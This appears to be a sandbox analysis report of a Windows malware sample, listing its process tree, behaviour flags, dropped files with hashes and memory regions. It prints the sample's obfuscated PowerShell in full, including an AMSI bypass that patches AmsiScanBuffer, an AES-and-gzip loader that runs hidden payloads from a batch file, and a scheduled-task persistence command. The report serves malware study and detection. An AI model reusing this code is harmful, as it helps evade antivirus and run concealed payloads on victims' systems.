$_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+'3'+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$MReoAfzuPWwKwu=$XDzDUpcqwQRrX.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+'cAd'+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bjsiiHnvWsmVeQHRzwh=SaKyHMEZbXiX @([String])([IntPtr]);$sFXwOEmxsHgnQCOErSyXKr=SaKyHMEZbXiX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TlHKqCPBUfP=$XDzDUpcqwQRrX.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+'l'+'l')));$KrvbtswIJwajxW=$MReoAfzuPWwKwu.Invoke($Null,@([Object]$TlHKqCPBUfP,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+'ib'+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$fmkTGqhbJDLZbvSCQ=$MReoAfzuPWwKwu.Invoke($Null,@([Object]$TlHKqCPBUfP,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+'e'+''+'c'+''+[Char](116)+'')));$kKpiDGE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KrvbtswIJwajxW,$bjsiiHnvWsmVeQHRzwh).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+'l');$ddTghAFtXOTurWrpb=$MReoAfzuPWwKwu.Invoke($Null,@([Object]$kKpiDGE,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+'S'+[Char](99)+'an'+[Char](66)+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$fctBeENSHh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fmkTGqhbJDLZbvSCQ,$sFXwOEmxsHgnQCOErSyXKr).Invoke($ddTghAFtXOTurWrpb,[uint32]8,4,[ref]$fctBeENSHh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ddTghAFtXOTurWrpb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fmkTGqhbJDLZbvSCQ,$sFXwOEmxsHgnQCOErSyXKr).Invoke($ddTghAFtXOTurWrpb,[uint32]8,0x20,[ref]$fctBeENSHh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kV2tB9nO4F4vksE1XanCNN0CKaoOh+Fwv5J9FKyM/rQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GDJTUCxdRiEvidahg0KvVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qBwZy=New-Object System.IO.MemoryStream(,$param_var); $HWMGu=New-Object System.IO.MemoryStream; $jHVMR=New-Object System.IO.Compression.GZipStream($qBwZy, [IO.Compression.CompressionMode]::Decompress); $jHVMR.CopyTo($HWMGu); $jHVMR.Dispose(); $qBwZy.Dispose(); $HWMGu.Dispose(); $HWMGu.ToArray();}function execute_function($param_var,$param2_var){ $RLZnq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DuryM=$RLZnq.EntryPoint; $DuryM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat';$fOqeP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat').Split([Environment]::NewLine);foreach ($ishbx in $fOqeP) { if ($ishbx.StartsWith(':: ')) { $wXPsE=$ishbx.Substring(3); break; }}$payloads_var=[string[]]$wXPsE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olhds4qc.2jp.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exeFilesize
411KB
MD5bc4535f575200446e698610c00e1483d
SHA178d990d776f078517696a2415375ac9ebdf5d49a
SHA25688e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122
SHA512a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717
-
memory/464-117-0x0000027E9B570000-0x0000027E9B59B000-memory.dmpFilesize
172KB
-
memory/464-118-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmpFilesize
64KB
-
memory/464-111-0x0000027E9B570000-0x0000027E9B59B000-memory.dmpFilesize
172KB
-
memory/636-76-0x0000025560E00000-0x0000025560E25000-memory.dmpFilesize
148KB
-
memory/636-78-0x0000025560E30000-0x0000025560E5B000-memory.dmpFilesize
172KB
-
memory/636-85-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmpFilesize
64KB
-
memory/636-84-0x0000025560E30000-0x0000025560E5B000-memory.dmpFilesize
172KB
-
memory/636-77-0x0000025560E30000-0x0000025560E5B000-memory.dmpFilesize
172KB
-
memory/692-89-0x0000015B54100000-0x0000015B5412B000-memory.dmpFilesize
172KB
-
memory/692-96-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmpFilesize
64KB
-
memory/692-95-0x0000015B54100000-0x0000015B5412B000-memory.dmpFilesize
172KB
-
memory/760-122-0x000001E0631D0000-0x000001E0631FB000-memory.dmpFilesize
172KB
-
memory/988-107-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmpFilesize
64KB
-
memory/988-106-0x00000242EEEF0000-0x00000242EEF1B000-memory.dmpFilesize
172KB
-
memory/988-100-0x00000242EEEF0000-0x00000242EEF1B000-memory.dmpFilesize
172KB
-
memory/1676-41-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/1676-59-0x0000000006890000-0x00000000068D6000-memory.dmpFilesize
280KB
-
memory/1676-43-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/1676-728-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/1676-32-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/2880-50-0x000001D63D200000-0x000001D63D222000-memory.dmpFilesize
136KB
-
memory/2880-60-0x000001D63D270000-0x000001D63D29A000-memory.dmpFilesize
168KB
-
memory/2880-62-0x00007FFAFE430000-0x00007FFAFE4ED000-memory.dmpFilesize
756KB
-
memory/2880-61-0x00007FFB004E0000-0x00007FFB006E9000-memory.dmpFilesize
2.0MB
-
memory/3104-66-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3104-73-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3104-63-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3104-64-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3104-65-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3104-70-0x00007FFAFE430000-0x00007FFAFE4ED000-memory.dmpFilesize
756KB
-
memory/3104-69-0x00007FFB004E0000-0x00007FFB006E9000-memory.dmpFilesize
2.0MB
-
memory/3104-68-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4004-23-0x0000000007B60000-0x0000000007BCC000-memory.dmpFilesize
432KB
-
memory/4004-18-0x0000000006930000-0x000000000697C000-memory.dmpFilesize
304KB
-
memory/4004-0-0x000000007466E000-0x000000007466F000-memory.dmpFilesize
4KB
-
memory/4004-49-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/4004-24-0x0000000008810000-0x0000000008DB6000-memory.dmpFilesize
5.6MB
-
memory/4004-27-0x0000000008140000-0x000000000817C000-memory.dmpFilesize
240KB
-
memory/4004-22-0x0000000007B20000-0x0000000007B5E000-memory.dmpFilesize
248KB
-
memory/4004-21-0x0000000006F30000-0x0000000006F38000-memory.dmpFilesize
32KB
-
memory/4004-19-0x0000000008190000-0x000000000880A000-memory.dmpFilesize
6.5MB
-
memory/4004-26-0x0000000007E90000-0x0000000007EA2000-memory.dmpFilesize
72KB
-
memory/4004-20-0x0000000006EE0000-0x0000000006EFA000-memory.dmpFilesize
104KB
-
memory/4004-25-0x0000000007CC0000-0x0000000007D52000-memory.dmpFilesize
584KB
-
memory/4004-17-0x0000000006900000-0x000000000691E000-memory.dmpFilesize
120KB
-
memory/4004-16-0x0000000006410000-0x0000000006767000-memory.dmpFilesize
3.3MB
-
memory/4004-9-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/4004-5-0x0000000006330000-0x0000000006396000-memory.dmpFilesize
408KB
-
memory/4004-6-0x00000000063A0000-0x0000000006406000-memory.dmpFilesize
408KB
-
memory/4004-4-0x0000000005B50000-0x0000000005B72000-memory.dmpFilesize
136KB
-
memory/4004-3-0x0000000074660000-0x0000000074E11000-memory.dmpFilesize
7.7MB
-
memory/4004-2-0x0000000005C90000-0x00000000062BA000-memory.dmpFilesize
6.2MB
-
memory/4004-1-0x0000000003530000-0x0000000003566000-memory.dmpFilesize
216KB